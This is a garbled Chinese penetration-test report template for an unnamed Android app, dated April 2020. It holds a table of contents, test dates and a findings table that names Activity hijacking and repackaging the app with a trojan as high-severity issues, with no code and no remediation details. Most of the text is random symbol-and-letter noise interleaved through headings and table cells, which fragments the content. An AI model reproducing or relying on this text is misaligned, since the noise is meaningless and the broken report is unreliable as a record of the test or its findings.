+ i8 t1 C9 Y0 l( Q7 c# s# T" e
! ^% M+ L1 I/ l6 O* Z3 E
- C0 c! T8 O" N8 N0 r7 B+ e9 G0 v7 F" |7 K3 q( @
`5 s# s2 j5 o$ C4 i! D- M; p/ y6 Z' ^$ @) D7 [
. F8 U% ~) e8 k" N1 b1 m' M7 z- t5 Q" U6 _: ?+ F5 R! f4 d
% S* \/ Y6 l5 I% x; Y7 k* p7 ~$ P# s- W- b- E/ y/ i+ Y
- m7 M$ N4 q# p9 F9 e7 g! ]8 I) }$ |# f. P- r
文档编号:
* N7 f* }& m5 g3 ~' |) `/ \' c ]3 ~9 f1 X- b
+ R& R$ U0 C; @: W* ]
0 \1 [5 `7 ^- y2 V/ ~; C# m
' `/ A+ q$ l9 W0 R; h2 s1 j% w( {6 z
' P F6 {6 H2 f" U% z/ c, k ' V2 w2 C7 ?$ J8 B' y
$ d) l/ c5 x4 }( J, f
; v% N& }( K, d* c0 z+ N. @; h, g' s- B8 M1 J
9 N3 o3 y) R& u8 M h1 F* d% ]$ z1 `. X6 j! N
# }; K/ m/ a) G
' O* H+ C! Y! w$ P: d# D
/ g& e* n9 b1 g9 D5 v2 u
3 F9 k& d5 `) B3 m
3 p4 v0 @9 ]+ E4 x T7 T3 C/ G; w
, k3 `) V# x! ~- B , d" A" P1 V& q x) N, t
) W! j- U: x" X- B6 K
$ ^ G* @: E( ^5 `! n$ [% q; r* U; F! G
3 C6 |+ | y) h6 V& |
7 q9 [: H" P( s7 R/ w
4 R7 |3 I8 T. @! I$ @# {; @3 j# o5 k: O7 A4 s! y
$ C6 `( k) s, q. s- c7 s c
% c+ W+ K" U0 U
|/ u5 `9 Q+ M8 k( S+ }+ U" }$ `8 E- F* M0 z0 W
) P' o' n7 S% K5 b9 W
' l' N$ d u* u" T2 P; y
$ F4 @( g- T. x4 z" V: I; k$ w
. c2 y) J: O3 a
+ J8 e5 g, p: K: H
% A9 R. f0 e: E7 \- u a6 b 某某某APP渗透测试
! w4 V/ r l. F; O3 S) K* X9 O- X7 Q4 B6 l/ S6 S- R0 }+ k
W+ b! o8 G* I/ n/ v' m# {
) k/ W2 Y* K4 K' N6 I2 y4 i0 n
0 q1 x7 q+ x( S* ?* P, j
f. }: W" y( V+ W/ |$ W
5 O" g& r1 H! W: }8 `5 v1 z) z8 q, f6 H
* U- M( c" U* T- h3 J$ B4 K
# K0 \' P2 M( a) o
5 p9 P: D' p1 L4 t+ e5 x8 n * v. i8 m( Y+ w& A) c9 n; h2 t7 \
- \8 K1 E! {( X) n/ g2 T7 D
- B9 K D2 |, _4 p$ E
% ?- v: \- R, w: e0 L1 Q* ~" M3 W9 M
, {8 R5 _, g2 i
& ~2 w4 }3 f5 x0 D9 ~
, C0 U! E; c- k( }" P- D- r7 V
6 @* M; |9 d- R% u1 B- [3 l. t: D
. F7 b2 N4 s9 O4 z' p9 s- G H
- T: |8 E" t' _
& G# s) ~: f I/ R0 U
% h% I* x" G+ S. q) r . [' N f. q3 ?3 @0 z5 N( y1 t: N2 e
. E p5 |- N4 U# U6 ~ ) a8 e0 ?% ]3 K" ]' ~
; v2 Z* q8 U8 ?) {
; V1 m. ]# o( s w" [
( P# J+ t+ M o3 ~
* ~6 @3 o; v5 |3 i
5 g4 J$ j& @! O! q; w
技 术 报 告 ; P$ e+ C3 _& ]7 d: e, e# `6 q% u
3 @1 o, y! y) V* z7 x- b6 r7 t6 S
6 Z z6 I: ]3 ~: N2 I% S# |6 W, v0 j, |/ k( V/ M) g+ P4 X
% g& w+ p1 g$ G1 C# S9 ]$ b! c6 [" @4 W8 l( f* c, F
( `/ O6 S$ |7 v- {/ E2 u
! x9 ]; z5 _! C% `, F
7 j' N7 R$ w' v6 G/ X9 p6 W( @
0 @, Z1 z1 m: g
x( w& h/ n. |5 _4 L" Q2 I
) z2 {$ [6 p/ |- [6 L: l- S5 L7 F
$ A% ?/ u( L" j% g$ ^# D
* e. A7 |1 t& M& c) v! [$ `
- M W# `- [ [9 K" \# ^7 _% o: O
% v2 c2 y ]5 |( I; Q
& t5 ^% n2 B6 y# J! }* J
- C( U4 U/ W7 D" D8 O. F/ I) @
! e# L, @2 Q; {8 a( `' f F
7 p* h' K. l, n, F* W9 a
. L% u {) D6 \9 V1 _( u! y8 U" z5 \+ p- f; B$ V2 j5 F
( J# }+ ~4 g: ^/ {% x
# o! _ t+ Y! c2 D0 {
* r9 w# r) c0 h7 y/ `' y/ y9 f1 ~5 z5 x" G
. p9 N% k- R h: O; g( E4 }- D) S- n
- H$ h, q# H8 H# ~% a5 O# H: \0 ^# c # F1 W$ A5 m) b
0 P& U8 P: }/ g- T$ {0 ^& h
6 f! ]; s2 X, N8 @
a3 l3 ?$ p- h3 V& Z: B; u |
, o& m9 L- F3 e8 n8 v" S& u+ @4 v9 |5 a2 i0 S
! p, c5 o @+ {" W( ~
9 k* _8 v9 z& ^2 b% |" b
- d1 a: U0 H' e, |5 b( ^, v+ U# X' b" C E5 Q
: z0 K3 [- w8 @) ]
. y/ ~' o9 l+ \3 t
* s; w4 Y( u: W! O* Z6 h$ K' d. F$ o! i, ?- M; ] c. y3 h
% z. a+ a; l4 y$ |; f! E
+ ^% i' p; O" @5 W' s' u) K8 l
' A3 d! |& K0 {1 B
: F f! w2 J( z& Z' m
$ l7 q: f- t! z- k. @: ]$ w' N/ }5 n& B3 G( J$ s
2 u3 o0 @% i- c. C
4 A' ?, i& p. l; {+ F! e
# ^- I. D* h" W) s& J# y o5 a. ^+ T/ I
7 q5 K0 ^% p Y% y
( Q% }, N& g$ U. H4 q$ p4 M
( ~: Q" }9 T+ `' v
, Z1 q' C6 f- e% {
7 i8 ^( i+ H2 Q2 @. b7 W k; b. S5 h5 u" _( A, _
/ e) J; m6 {) p, ^
& v9 b5 U) Y) b4 F
: K. Y) n7 K2 ]. E/ j. @
" n0 N) J8 j- K7 D
9 y1 u/ k2 f: X# V% Y9 Z, D
" p6 V% q! K. f
# ~+ a0 c3 F V$ N4 V: E! a% Q, i1 l0 B1 x. |- R, a$ P
8 V9 x5 y3 W" @! D. r$ o7 `; M5 S
8 K. J8 G" W! ^
4 }, y( {8 X# v( ~, T" a
4 G# S, W9 A; A) {0 X* [# {# G
0 |: W9 q. @# l w6 k% }9 l" C
8 d1 ] J6 Z& z) x' @! V
# a& s) w& C9 N0 \& E. z: u) T
$ |' f+ A; K2 F- ]0 n' P
- r+ E$ F% h/ b2 s/ A0 ^* Z; g d: W+ ~+ D
7 S. W; A. c2 u# ?# n: O+ C
H9 T- E8 @$ |/ S
& r# n+ d* a d3 t
6 u# I) n* {7 g& l# x9 ^
9 g" P6 r/ c4 v# ^' b2 n
5 e; X7 I' \( _' A8 z6 q 8 X, v. s/ u( i8 [
$ u4 G7 K) Z9 f+ ~( R. v4 g
6 f& v: [% T- O; I2 n- H+ O, t- Q/ {- j
, {% \) e* N7 s! ?2 ~
6 h5 ]2 c2 F) K( ?: p. L" O
2 O8 O' q: @. K$ B4 \3 ] 0 u% N# B8 M O6 \/ r' x. G
5 C$ x0 |1 t" b4 T
4 [1 Q! a. f! F Y8 x/ A
6 q [- w* J! A! {. U$ K. g
/ n0 K) X% G& N' J
: n1 b- ]" @2 H
5 c" a0 I6 e s% j9 D8 J5 ~# K
9 g4 t' g* m) c) V' V5 x! n + d. d( ]7 ~6 i+ g; n( ]2 u
! z c1 }# c: y: S
$ S. F. ^) O, j- J( t8 S+ e1 X# _# U
- P7 Y" H1 U# D8 S4 A5 X7 Y) X
m7 Y, d1 Z, |: c2 u e
( H( a5 N' O: n
: q9 ?/ p! K! f+ {& J) b
3 h; |% B4 D; b- r
' C' {$ [8 g' J
( c! Z( T* ?: Y% v. z: [3 m9 R
' h3 _4 L% j* O- o. L9 ~1 ~4 x
0 w, G- H/ s& c v% |. {, ]" |: A
* V7 \3 w" b, t- c- p2 d3 w3 \% i' U# W
9 p+ O% d6 J F0 J/ j9 h! A 2 F0 O7 S7 C# R, f s8 Y& }& O
$ B% f) W3 b# n5 W) S 二〇二〇年
Y$ L9 t( D! A+ @* R7 O: T: L/ `. {" p
/ }/ j; E u; t/ b+ F3 r
: a1 N4 v* R+ I# W' {4 } 3 ]3 s8 I3 c0 Y5 J5 |( i, }
5 H* X5 T% g$ ~ w8 F& ~9 k: c
" ~& O+ S1 v( d% l( C6 u
( {1 k! ]8 D8 y# P, u8 H
% {- N* g; v5 F( w5 x; _
4 J' k I3 Z3 q! J1 b0 _/ A v9 b6 |1 Q5 R
& F" `2 u) ^5 M+ j; A! W4 N0 c
; z" o- n7 O% L3 Y
( x6 }/ x" C+ ^, V) ?
# \# H8 i8 R. ?$ Q$ a; ^! y3 y8 ` {1 |) i d( S. @. Z4 T& `
3 `, S: ?9 D) V# H4 V0 Q' V, k3 ?! B
1 H% k" b" {% S/ U ; P3 |* T, d3 v' n' `1 |1 F3 F
+ U% r! b) e7 i7 u5 j0 D
6 C. w3 q: N0 \: q
5 x7 [+ S& _, ~2 g* K 目 录
8 f3 H% E2 v# n3 j8 m9 A
5 p0 l: P; U5 W# I5 b6 |) f
5 z+ r( H- M; F- w/ G* ]. u3 m5 t9 ~
) v' C: `+ i6 C9 |$ _
/ z& q' t b7 E$ B7 u: U0 Z
* ]; E2 V3 `4 U/ o1 |7 ?' K1 N
8 _- F8 a, e, d2 @7 W: y d5 j1 y' ~2 ^
, F8 Z2 R2 g! M
% R0 E5 Y( [) U$ e }
2 u- l( |% T# T: l X
{7 j1 Q/ s/ H9 s/ `
4 l2 h, [, A! Y$ J- G# \# |, A; f6 s3 K7 z0 X
1 概述... 3 9 Z0 A$ u$ ^7 s- W
4 C. B# S) a1 ~4 k8 y6 E
) S% {2 H$ v$ M" O5 X9 q
7 O p9 K3 S+ s( u9 d. ?/ D 2 x$ m; f7 O1 b' ?
- f) I( s6 z0 J, H1 L9 k0 q+ {4 Z 1.2测试时间... 3 : d2 d. ?* l4 V M0 \7 o; q; I
8 H( v0 {9 _- W; M
6 l7 {9 {, |) ~7 Y" C
; _* T7 s. I8 |5 Q# N. a
4 k+ V% M q( B9 c% H/ Z, r, ^) z1 D# H( S
1.3测试对象... 3 & N& x" [# I0 Y5 q
( J, h2 |+ U8 x9 ~5 P
/ C/ G0 c0 h$ @2 J+ @ G3 j
1 `8 X \! q2 s- X4 j2 @ 5 m9 \9 u* H0 A7 Z
- S3 h9 Y" J0 X. g: r# D3 ~0 a
1.4测试结果... 3
/ b" t* a8 q: ^7 ~7 f7 c# }/ L1 N3 c3 ^: |$ H2 b4 r9 P$ d. F
8 u- V1 H1 f! \; T2 I, Y: d/ K/ C1 |1 Y! x2 D. L
9 }2 F% y; g4 g" F0 S! G8 b" l4 {5 J, a4 r _; F" k6 M
2 检测结果... 4 ! w" f2 i; {$ h* T' _5 L9 q
# M5 p. ?* \6 j' f
* l( W& y0 r' _9 c
1 |$ [8 }5 _! l3 n 8 S# W8 P$ s( c& D1 q
: p& b" ?) v7 g7 d& E5 ^
2.1 某某某... 4 9 l% _+ q) ~$ Z# u% F
" _- m2 ?+ G+ i4 r- L/ a+ {/ |4 T
% N' v) G5 V% B$ y) R7 ?" w. }" V4 s4 L& y. _3 s- i, [
% T7 T% F; ?+ c. E
5 U: x& N& c6 d
2.1.1检测目标... 4
* d5 h4 s/ p5 k! }) v/ G% U2 p/ c* \
e C6 J2 O( O0 r' w5 d$ F1 p* ~/ \
* p5 i' k! ~/ Q9 @ , ]$ t! K C Q) `
s% e+ X( P1 h ]2 C, \
2.1.2检测结果... 4 ; J; o7 {% Y/ j5 Q
& e3 K0 V# S) O0 I- _
. p. ], F! d, U7 E# R* ]% g
4 H0 W! d( T' Y' a5 i: K 1 X" I% [( N& a) E1 W7 s* W, O$ K' f% g
! L _& t8 e6 Y! S/ a( G# L
2.1.2.1. 4 , m4 b5 {! H* e2 i
9 N# k6 ^7 d/ c) W5 D& s: w
+ @% X, ?7 S8 c1 v, {# C9 a. N4 P! p5 {
4 K# a/ I1 E" i: V) I/ k' l( K 7 u s* I- F! Q- c8 B( G9 W# O
7 a7 q: C T( ^8 I
2.1.2.2. 6 3 U A$ m) p3 [
% S1 N" @1 J' y
. u2 }' p4 \2 J
( J# V2 ^6 L1 T- s- q9 [
6 m1 H) \' o# r3 O& O" g) F4 Z B1 `5 `1 }. I" i
1 _4 k# Q1 Z" A8 z* A- j0 w
/ y' U3 `. U9 L4 ^! Q# Q: D! E9 b1 o
- y/ ~9 X9 ?0 m; a3 s5 o9 M
9 C- ~5 ?# v: V2 g& k% S
2 _ Y p6 h& s% U( w
6 ?: @0 s% u$ w" V/ L4 L U# W
Y F9 v( O! }9 O9 b" p+ P- d2 s1 i$ m! F
4 R5 Z. b+ I* C; C: l
- I2 Q2 h k6 m% ~% Q
6 A3 X) h* t! h/ N" d$ V) s' Y" U1 O! D; W% U) K T8 B( q) r9 v, k
" k H1 w, c2 d# }* Q4 _
5 y* N" E. E/ `: }" s0 L
1 概述
) h% y6 h/ K9 I" Q& C5 I8 [& y% |! g7 o# F: c- |6 O0 h
, f6 q7 `4 n/ Q) i
) i3 ?& S, `& m9 @: B
8 R% ~, V. W k% S% b# ?/ S, i. U" u h2 d9 c V: `9 V: j& g0 l
1.2测试时间
% U' K4 I. d& v. ?. o( Q2 x
5 s; Z" c: Q0 q) h j- G
; s# Q9 ` ~+ L: g% s- r4 |/ G
: T$ o6 t# s% l& _6 e! b
3 y0 g r4 F8 h0 r2 d
+ g0 W* c# E: S( O3 l
: v; V/ }8 i4 b- A3 n* Q
y( I5 E0 z* ]4 ]- V! s& I
8 d9 t' D- S8 ?3 C5 w s/ r
; I1 e$ Q0 G! R. _
# P2 H' Y& t2 }, i % C. ?* ]4 I: g" w+ N8 K- m
0 u! N4 }" i1 t0 r# b# S# [8 z
渗透测试时间 8 e6 ]. E) A8 ~5 t; x5 P
- a# v0 \ a- B. ?& V2 A8 Q* ^
3 B3 P3 d- W" l M7 M
, u0 l/ T: K6 S/ C, ]8 R | + \5 m8 h3 O% ?+ O2 W
+ J6 c' f2 {: Q- k; z8 r
* W8 c d8 R! r0 o: P3 @8 W& u3 ~2 V8 b
' Y A$ o e, U/ p
4 C: O+ b2 N2 ^2 Y7 V
* |! i4 E7 @" G9 u( j
) J! y7 ?3 a4 V$ i9 Z7 d- \: e+ Q- o* F9 e' }
, _+ \' B, V0 u, t, d7 V* T& S/ p$ Q e/ \/ r1 Z. u% [# w- z
起始时间
9 V2 R" S9 B" A$ k/ k$ e7 d% d9 }, L+ y. l
% w; z- \6 B/ Y
* }( b( t$ [! h4 Z* y+ s | ( l4 m$ p2 r& D
6 v; `0 J3 H4 ^- O0 O5 C
- c- P1 _/ S; Q4 Z
! Y' L& v% j4 d' E/ c
& x/ N% l* {4 ?6 ]4 U q
0 K% h( l% X/ O& M# J2 ^: m3 X 2020年4月6日 " ^) m* X; T3 n+ }' m' Y# E
# U% W: m6 J I/ q& J6 b6 h . W4 N. L6 q: L& B
4 k3 p, r1 r: n) ]1 d
|
6 \* u3 V' O- J2 l6 c$ f, J$ Q. D0 l: L& o% [
, I. S2 K$ S# Y( t+ x1 K2 v# d6 e$ U G; z' }8 ~& _4 n- @
. y. ?* q5 v4 b) P7 b9 h( Q% M
; m! ?& ~3 d1 F( H) {$ W7 z9 J* H : H( _1 Y$ |4 e3 B
7 e) B5 u$ x* F0 T" s% V # ]- h+ C% d* I5 n( U$ e z
4 w. z! l3 @2 J0 y- W ` 结束时间
6 i, d+ ~5 m+ `2 _9 Y( H4 P& ?4 ~" y8 z$ @) w& i/ K2 W
) g( p6 H7 S: N$ @( F( x0 y1 u0 E( t# S
8 L& I8 B6 |# ~' S+ U9 B+ B2 y |
/ l: Z& ?2 M, q5 A4 B3 p! D5 ]/ B1 ~5 X; x0 E1 M8 a. v6 b$ v
) k# R" T# |* q- f/ z
. O4 x( R5 Y- W2 k - h7 A$ u# Z3 c
5 E7 d$ _6 n0 ] M
2020年4月9日 & H4 P8 j1 ~' a7 [: N7 D6 Y' D
. b' C7 V+ _( D
# i$ g& R$ `3 P, q4 {7 t0 r$ m3 X& p: I' n" [0 g7 f" n
| ( c. Z0 K' `9 k, N+ R
1 b$ T9 G9 H H( u2 Q0 w' J& E# F
* R( q* u( B$ _1 t( h H
4 i: X( Z* o$ z' A 3 m- z# ]1 _, a4 O5 G! E* G1 w2 h5 U: ?5 ?
& k9 M6 Z) t3 N' `( @
. g- W/ q, I& s5 M
5 x2 V5 X+ T3 z n e
; z; p! w7 e& x* G e7 i, U5 \
& S- ?# r3 J6 G3 t$ M7 B7 ? 1.3测试对象 " s$ g: S& V: c5 q" H7 S! v" {9 z
, ]( U- c0 U+ Z2 p) m
( x3 o5 H* U$ N2 E( f1 E s; B) e4 K0 W0 _4 H* l/ Y* Q
9 i c1 b: V5 X& E9 V& c$ K
/ v# _# X3 L& y. I: w 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 5 i H& w. r! O7 f
$ V6 f+ Z4 N( p& n0 s
! C3 B+ N3 I& D% p+ a
% h7 y1 K- R0 d( s3 J7 a" ~3 } ( I/ l& K& Y' {( F
+ y$ c8 X! D; W2 Q, G7 N 表1-1 检测对象 }8 L0 ^) Q1 T& }4 G3 S7 H; ?' w% `- a
* e4 ]3 i5 Q5 [7 ?
! {9 A+ e0 n" y4 G; y" n$ S W4 w. t/ @% y. R1 u
; I/ S8 {$ c0 j2 H
" W, \: X" h! i
4 h( _5 q0 { `6 j& Q6 b5 ?4 B
. g8 s' k4 {7 t `8 K* E 4 S/ z" O- o: Q& @: e) E
1 Y) k( |, h( A( c% _ F) ~
# L x2 `6 K) S5 R
: x& m. \' _ b t
% L/ j8 E: G' v/ B
6 u! g5 x2 U- V) _$ g 序号
& n( E, v7 C0 D9 j" |6 |. u, E; A( X; O" }8 r
) ^1 L: Z$ e0 _7 i, w/ n% ^& b. ?
|
. M3 O q+ j- S3 B- V1 f9 n7 q) i6 }3 x& _3 t
, n( U( V/ R- [% |' j6 E' L2 k
, Y$ b7 S( O* {9 X' r# s" E
+ ]0 F/ |6 Z. r2 r
- N/ |, ^+ B. t" |% G9 `6 t
测试对象
" @' b, |, G0 i3 [( |- p: s" y. L6 y- g f6 y0 `6 c# q
/ ^$ ^5 l! p( N; K) S$ K; C, Z1 I% T3 u: b
| 9 n6 c8 @, U" S/ A( ~5 D' i! a' B
5 X0 m2 O2 ~- F+ s S# o$ g, o' T5 H q% n
! B( S n4 n: U6 s# i7 s* W
7 F- ^$ o4 }) ~2 N/ l( T3 Z
0 s- F( [) g/ b6 Z2 X0 p 测试地址 7 K) c, G/ W/ E; Z! E) X# g
/ z# Z; E1 e3 X/ A$ W
+ L2 f# `) z! A/ @* V! v9 @3 t- N! V7 P" _
| 4 f9 b, n. Q2 |; l% m
* Z* t' U/ Y" F; X# Q- |1 L" s5 T
8 S4 e, q" C: d( k7 g: `8 C1 v. \
% M! p8 C! `8 C! M$ S D; n% C L, c
" O0 p5 l* o0 O) T# } X- @) p1 {( F7 F
安全漏洞
; r3 U1 D; c3 S" o
/ h( M3 W' v2 P$ y: O( i3 V8 w
" F, a' z+ @2 h1 Q% O5 ]
s; R0 K M5 Q) E. E5 j: t4 W | N z$ Q3 }0 {# r" j- Y& s
: d' c/ @1 D* ?
0 T3 c x4 C3 E0 k$ |5 u) J& Q! {; F5 a- t! E$ \+ e/ x# G1 l7 l
4 a: b: a8 v& X! g H; E) H
0 z* R, G+ V; S
8 t4 `& { |: D/ g& T9 `1 h. d& M& P7 }6 t; l! l
/ U3 p. j/ z3 e: r! R7 P3 G
2 f$ l. A/ d) P2 m0 ^
1
4 }1 ~! \6 i3 l4 n6 k- y- A' |0 k5 ^, ~+ _
( k# Z8 `( C' U n' t
4 J, a* |! k8 \ | * X6 P: e* n" K% d$ r, t! }0 u
% H- r: {+ A, R1 i! t
: u5 I G% {6 n# Y) u; c1 N& t$ o/ \
# {- b4 g& H3 o% N( {: T/ H2 m
" u' k0 q! w6 ?) b5 f( C4 Z 某某某安卓APP 6 m! l' t' a1 l A
* `$ o* s% S0 d7 L( A 5 N5 K7 E2 n. I+ }
( n6 o' f, G( e, g |
+ L$ I; [. [0 v4 T
) P) y) y1 A/ ^& P2 U/ z( C " I' Z' V1 }- ?& I! e$ a
( C1 Q+ _) w+ o; A+ N1 H
( ]( b- M4 a. {5 j7 g
! {! d4 T9 }+ c7 F 7 }. {6 J7 X" B+ Y1 Z8 U6 U5 C
/ L; R. @0 G+ Y9 v+ V
( p8 P5 d3 ]$ ~, v8 M1 I/ |
' J# a: s; K' j7 t7 v |
. E0 u* g3 G; K
$ S0 E$ }" g7 o ?: C( | 6 M# M: z, x7 K# h# z1 O( Z
' x6 r8 P+ h1 v1 }: e) I# _9 ~8 d; U) f
+ u1 y% k. {* G q! [4 X6 Z
4 F* D+ y7 l- N# G4 Z8 y 2 & o! A# D9 s' U* n* t3 E
0 ?8 O1 e5 E; I$ z% W
; ^" ^2 j( T: I2 c U2 x% u* S* [2 }
% h8 v1 `5 b* L9 N | 9 }: L& \. P! x
, b: J) O' w6 [/ A: c
H: Y. u- `2 |
, a2 ?$ U; L3 T' o. j
0 q# M* w; B8 j% b9 U1 ~
/ H. @% m2 ~' l
8 ?4 e, }: m T
1 v0 C: `: m2 p; Q x3 m
; j) h& P! B$ L+ }1 ]; e$ r( H
) |6 Z6 d/ u9 w! _1 Q8 `, r 1.4测试结果 2 B" o( ^, ~0 a. u% Z
) i! h% t, O; A" m* A# K8 D3 f
- C9 @2 f; A$ v' X2 L2 b! C- z! Z( V0 |4 {
& U# l7 e: R. a+ ~3 M4 Y
5 g8 ?) Q# ?2 j) A `1 f 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: . i8 I$ L: Z; ?; U
* H$ [+ B0 l8 Q& ?' {! I3 Z
: n) C0 M5 a7 a# M- |# E- |
2 _! Z5 u! v4 `) e" C$ V
4 _3 n0 M( v' b' K. U
/ I9 x E: h# i* a# \& G& p t5 K
8 ^! Z/ L. ?: F+ g9 c. L" h" z3 S3 Q, H! q7 _
( o8 j0 v% A; I, M: F6 x% k5 K' q4 R3 Q& c: W; w( d7 G
' t& y7 a8 p5 @; Z' i
& F' Y& A) y! [5 | [& A
( j5 q' U6 D* ]+ f# s3 D) c4 n& t. w3 r+ e
. ]5 n! d( R B: e+ i
0 ?5 _# I9 `/ Y- Y- F6 Z 6 i0 z3 T! \# w* r7 Z2 d
+ O/ G6 Y" y+ B+ K, t* r
/ U8 x1 m. ]/ O8 l
" o. u: A, L' o, D ; X1 P6 {% ^/ X- a) C# |; b2 o
R" K" C+ a. ?) v2 @) M 序号
2 }9 N7 N, S* s( E4 k3 F) l, s) U4 c1 u/ Q. ~) I% V( c6 ^
' {! K+ D" w7 `$ j' g
6 n3 f- B5 \5 M6 P$ _0 `6 R4 g7 ~
| ! Q7 C% G' P- H! \
" l3 c8 G \. n
& S0 T G h2 ^% D4 _5 R1 [7 f2 D6 D- j# F
: A3 ]* [0 [3 v/ e: e" o9 D6 P6 C
5 t9 Z: A& M" i. a% G4 I
系统名称 % _+ G- N0 ^9 J: W9 B+ V
: P4 e z6 O: T$ n
- z) s- l1 y$ b5 ]8 b6 W- f o e* K% N# O1 a3 z( @
|
% I$ g. |/ X0 O* ?: A- x
0 i( c8 t5 s/ Q 6 H# D v8 `# b! N' q9 N( Y
# @& h+ t( e: o & I- M4 p" e8 @! A+ ^+ i
& G1 q: B( }# ^, s
漏洞名称 & `1 v: }& U5 f2 o Q7 C# E- E5 T
! y3 b" N" R" Y. Y3 Y9 ?6 n( N & Q( a% ~1 m2 A; v
4 e! D) [; D: Y2 s( V6 A
| 3 ]& }: C: R3 j& P
! `$ a0 O3 U( }# m3 F+ v & _2 X! }( N3 U) \8 o# v0 x
/ C$ ]. D# V3 f$ O' M' F
! N/ P& E8 |, g$ h3 x6 X- V
: ^ e2 L t p7 H9 s. ]& S 漏洞危害 # D% [. x% j8 z* | w9 \
* K7 Z2 K! N1 o0 X$ N9 O 9 U' D* e5 E2 F4 ]
+ e/ K5 _+ r$ i$ ~ |
3 e% w6 M2 W: I' L/ {% {! ?$ u$ E0 x: s. A
2 t' n! T' a5 Y
0 x/ P7 I& E5 R1 t' o
C" ~4 Q6 O4 e, t4 q1 s2 l. |
: W7 O& q8 w$ N3 U' l) d 修复结果 2 F: Q W5 e* B% X
9 L) o: G: g3 f! r6 B7 c6 R
, z$ q6 Q1 @" {3 r2 x
$ g' {2 y' n7 A8 ] |
; M( v2 I& ~7 c: t; X! w: U, _9 R! T- n( }+ B; l5 g* p/ ^2 b$ V4 y
1 O; B1 S7 K+ _6 e
/ m$ W: w, M0 b) i, Z
) B' e7 r4 H9 K- W/ Y
8 v/ F, Q( Z0 b: A. O& G6 ~: k
' n; p4 y+ A: j
+ s. B8 a$ U2 \+ }' i
; M) y' ]9 w4 \0 H# Q
/ T% C0 \+ [& \- t) O; I' Q 1
$ |! } d. G! S0 I' b- p9 g- Q7 p9 d' U3 m
' y) z9 R L8 ^+ |& m' J; r
/ d7 C' |6 ^8 H, T | 8 ^1 j- Q) S1 M
& p: V' W' S B
6 Q' b6 _; ?4 m4 V6 }, h
# G- }( S; A4 H0 v# b* I% t
j5 w2 m* g! K% p2 ]8 w! A% |3 M0 c# T* R9 \9 ?
某某某某某某APP # d7 f- Y8 m6 t# c$ w7 `" h
! y6 f/ W- T- _8 W- y # Q% F% X- @ D! O
7 S N# w6 K7 s& V6 v& d- Q* R
| $ g' [6 z- c0 u) E7 H
2 G) l) E) J5 i5 G & v) c1 {6 @0 Z, c
0 n5 |4 ~: u! ]: d, q
5 x2 `* g7 V; y/ Z
9 h$ H: X+ k* O) q% ~ Activity 劫持 ( |# a9 E+ r# n
9 p, F+ b& y* a& ^
" ]' ~( j/ t6 c" f0 T$ ?% d
( s2 ~1 c# y0 G2 M1 \4 S
+ [" z/ Q5 D7 \. R8 x0 L) l8 L
) ^- |9 b; H# C/ g4 S$ T
Y4 e1 _/ Y p+ `
7 b9 w! v4 \0 `7 A: p6 t
* V/ p. t8 g6 |; k0 e
. ?+ z/ ^9 }- |* @2 d |
) C1 U6 j8 I) g/ m ]* E( q& D8 Z$ t. @
+ f; ~! S+ F0 N) W
8 v1 s. i Q4 f( j4 T
5 ]' U0 o9 j. F+ j
3 ~0 {$ E# f. l. v' z' D
高 ) [! S" }1 w6 w: j
0 S9 s: D9 x/ {8 w% P
- M3 `% h: u) h4 G: j/ H0 a
) a8 ]+ s7 C3 H# X( E7 e0 K: F
|
: ]* o$ \ R2 x/ z1 D! V# j: j9 F6 p% C* n
_9 f+ t* Q' k( \. D: I
7 X% X* O/ q1 Y% H2 l! p3 ?$ z
3 ?! A; f* B* B% i) P# l
$ v- E" k5 w0 U. S( i3 W9 ~ 1 w& u! y w5 }7 B0 S
( ~' r4 Q0 W9 ~/ o- h. V* h
8 f6 C7 q9 n( B7 u2 F9 H" H
8 P1 C0 z \* k v, F6 G | 6 o8 O% t, |4 k$ P* d9 k
& H2 B8 }3 @4 k) }
: V9 _. e6 D6 U6 T& b- @
. z; g* t4 ~. {9 J- K
! n6 I4 M! Y3 s$ K" |
1 C5 n% K$ X h3 ?: {
5 T0 ~9 i- Q; r) g& [. {" u6 _ ?- d+ O9 E& w4 j, f
P: r/ P# q. j, p1 |" F, M$ [6 m( s
- q( U8 g& s$ u) e6 G 2 " z$ w7 ?- }( V% ^, X
% {! f% n- ~7 ]2 Z5 \' C, c
- V" W" `4 o* w* }$ r% ]1 j
' p. w m2 j5 H: `" L% J | , F; Q' z. L0 J, N8 e" q; q
; a) k4 q: s H6 a4 l
! Y" ^. V: R9 K
; i! O1 V: E, }3 r" t, D0 X" S
) U8 f( ?7 `, w' W, R1 m: J5 v: H$ X6 Y4 A
某某某某某某APP
; p, B+ X1 T" {1 i7 s) {; l- H
* O) X$ j/ q% a; q; U : U6 r8 j* \6 r% g! w
! |* J& X- o; _3 t2 p! W, v, M. J
| ' h- l& |0 P7 m R/ ^& k: a( t
- `4 s1 P+ r5 |+ t2 {1 Y
' v. l# C+ H+ a F+ D
/ n" i. |7 a) f$ Q4 W4 S5 z ' s# h4 C* r! V& _" ]/ \
* u: k! _( }. K9 }
反编译二次打包捆绑木马、篡改APP代码
8 y1 \' Y, \( U/ q. b8 g4 s( i# H# a# P# l& C
% U4 P) N" f7 n7 v4 J+ `; E+ G _7 h8 y* }5 }
|
! ]/ ~5 C" Q( y" [! @5 v5 N: U' X+ {$ K, f' F; [4 }1 J+ G& H( K
& h" F' k7 e* M; r; T4 T$ N
. n" c, |( Z, Y8 S
6 |5 q, r* s0 J* [) v r' q5 P' \/ B! Z, A3 ]9 b' S6 t* @6 j
高 / S7 o0 s. g, J( V9 i! H6 V
: p. }9 N p9 _
$ N% H1 w0 ]/ t r e( ], |& m$ o4 t. i T; \! S4 | H/ Y' e
| 2 l# m) o' p1 S/ a6 J* e8 j: O
0 k: _( h: f/ s# J1 W- Y) Q- @
" \- q- _+ o; `8 Q/ C4 ?- F. I6 v+ z& J
# ^) ?5 Y' i! K2 U- r
$ y# p, U9 m" B9 E
2 |* V* p# w. [: K' e% ~( F$ V% p) ^ M
/ k: Q( q- h' k
: O* y6 ~! O' w% C
| 3 C, N, Y; m- x: k) M( ~6 N: [0 X
. ^6 u$ c7 E3 d: H
& `+ G8 a3 B) m) P, b; A+ A9 D. z6 C( b3 ?0 v C% M J1 h
/ B+ I9 n4 r! ?/ N2 H! t/ ]
3 F x/ R2 O* v# s0 U2 C
5 E* ]% r2 ?2 M5 x+ k' k) `" x1 J6 D3 i
- f, G6 j, m3 @- Q. `2 i
& A$ ?; a8 `$ e! |
